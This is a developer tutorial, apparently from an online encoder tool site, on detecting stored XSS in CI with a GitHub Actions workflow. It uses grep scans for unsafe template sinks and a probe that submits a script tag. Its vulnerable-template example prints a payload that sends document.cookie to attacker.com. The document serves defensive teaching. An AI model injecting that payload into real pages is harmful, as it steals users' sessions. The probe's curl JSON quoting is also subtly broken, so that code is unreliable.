CI/CD 2026-03-10

HTML-Encode User Content in Automated Security Scanning Workflows

Detect and prevent XSS vulnerabilities by automating HTML entity encoding validation in your GitHub Actions security pipeline. Includes YAML workflow with grep-based XSS pattern detection.

⚙️ Uses: HTML Entity Encoder — Free

The Problem

Your application renders user-provided content in HTML templates. A developer added a new feature and forgot to escape a field — now there's a stored XSS vulnerability in your codebase. You caught it in a security audit three months later. You need automated detection in CI.

Why This Matters

XSS (Cross-Site Scripting) is consistently in OWASP's Top 10 vulnerabilities. Stored XSS allows attackers to inject malicious scripts that run in other users' browsers — stealing cookies, impersonating users, or redirecting to phishing pages. Finding this in CI (seconds) costs nothing. Finding it in a penetration test costs $10,000+. Finding it after a breach costs millions.

Step-by-Step Instructions

1

Test HTML encoding with the tool below

Paste sample user-generated content into the HTML encoder. Verify that <, >, &, ", and ' are properly encoded. Use these encoded values as expected outputs in your security tests.

2

Add a pattern-based XSS scan to your workflow

Use grep -rn to scan your templates for patterns that indicate unescaped output. In Jinja2: flag {{ variable }} (auto-escapes) but alert on {{ variable | safe }} (bypasses escaping). In React: flag dangerouslySetInnerHTML.

3

Run a dynamic XSS probe with a known payload

In your integration test suite, submit the classic XSS probe string <script>alert(1)</script> as user input and verify it appears encoded in the HTML response. Any unencoded output is a vulnerability.

4

Block PRs that introduce unsafe HTML patterns

Fail the CI check when new | safe filters or innerHTML assignments are introduced. Require explicit security review annotation (e.g., a comment # security: reviewed XSS safe) to bypass the check.

Try It Now — HTML Entity Encoder

Open full page →
HTML Entity Encoder — Live Demo

All processing happens in your browser — no data is sent to any server.

Before & After Example

Problem: user input rendered without HTML encoding in template
<!-- Jinja2 template — VULNERABLE -->
<div class="comment">
    {{ comment.text | safe }}  {# ← XSS vulnerability! #}
</div>

<!-- User input that exploits this: -->
<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

<!-- Result: browser executes attacker's JavaScript -->
Solution: CI scan detects unsafe patterns + dynamic XSS probe
name: Security Scan — XSS Detection
on: [push, pull_request]

jobs:
  xss-scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - name: Scan templates for unsafe HTML patterns
        id: template_scan
        run: |
          echo "Scanning for potentially unsafe HTML patterns..."

          # Flag | safe filters in Jinja2 (bypass auto-escaping)
          UNSAFE=$(grep -rn '| safe' app/templates/ --include='*.html' || true)

          # Flag innerHTML assignment in JavaScript
          INNER_HTML=$(grep -rn '\.innerHTML\s*=' app/static/js/ --include='*.js' || true)

          # Flag dangerouslySetInnerHTML in React
          DANGEROUS=$(grep -rn 'dangerouslySetInnerHTML' src/ --include='*.jsx' --include='*.tsx' 2>/dev/null || true)

          if [ -n "$UNSAFE" ] || [ -n "$INNER_HTML" ] || [ -n "$DANGEROUS" ]; then
            echo "⚠️ Potentially unsafe HTML patterns detected:"
            [ -n "$UNSAFE" ] && echo "--- Jinja2 | safe filters ---" && echo "$UNSAFE"
            [ -n "$INNER_HTML" ] && echo "--- innerHTML assignments ---" && echo "$INNER_HTML"
            [ -n "$DANGEROUS" ] && echo "--- dangerouslySetInnerHTML ---" && echo "$DANGEROUS"
            echo ""
            echo "Review each occurrence. Add '# security: reviewed XSS safe' comment if intentional."
            echo "unsafe_found=true" >> $GITHUB_OUTPUT
          else
            echo "✓ No unsafe HTML patterns found"
            echo "unsafe_found=false" >> $GITHUB_OUTPUT
          fi

      - name: Start test server
        run: .venv/bin/uvicorn app.main:app --host 0.0.0.0 --port 8000 &
        timeout-minutes: 1

      - name: Run dynamic XSS probe
        run: |
          # Wait for server to start
          sleep 2

          XSS_PAYLOAD='<script>alert("xss")</script>'
          ENCODED_PAYLOAD='&lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;'

          # Submit XSS payload as a comment
          RESPONSE=$(curl -s -X POST http://localhost:8000/api/comments \
            -H 'Content-Type: application/json' \
            -d "{"text": "$XSS_PAYLOAD"}")

          # Fetch the page that renders comments
          PAGE=$(curl -s http://localhost:8000/comments/)

          if echo "$PAGE" | grep -qF "$XSS_PAYLOAD"; then
            echo "❌ XSS VULNERABILITY DETECTED: raw script tag found in response"
            exit 1
          elif echo "$PAGE" | grep -qF "$ENCODED_PAYLOAD"; then
            echo "✓ XSS safe: payload was properly HTML-encoded"
          else
            echo "⚠️ Could not verify XSS encoding — manual review required"
          fi

      - name: Fail on unsafe patterns (require review)
        if: steps.template_scan.outputs.unsafe_found == 'true'
        run: |
          echo "CI blocked: unsafe HTML patterns require security review"
          exit 1

Frequently Asked Questions

Does Jinja2 auto-escape HTML by default?

In Flask and FastAPI, Jinja2 auto-escaping is enabled for .html, .htm, .xml, and .xhtml templates. The {{ var }} syntax is safe. The {{ var | safe }} filter bypasses escaping and should be used only for trusted, pre-sanitized HTML.

What's the difference between HTML encoding and sanitization?

Encoding converts < to &lt; — safe for text content but removes formatting. Sanitization (e.g., via DOMPurify or bleach) allows some HTML tags (bold, links) while blocking dangerous ones (script, onerror). Use encoding for plain text fields, sanitization for rich text editors.

Can I use semgrep for more comprehensive XSS detection?

Yes. semgrep --config=p/xss has rules for Jinja2, React, Angular, and Django XSS patterns. It's free for open source and available as a GitHub Action (returntocorp/semgrep-action). Add it alongside grep-based checks for defense in depth.

Related Workflows

Want the full HTML Entity Encoder experience?

Open the standalone tool for more space, keyboard shortcuts, and additional features.

Open HTML Entity Encoder →

Related Workflow Guides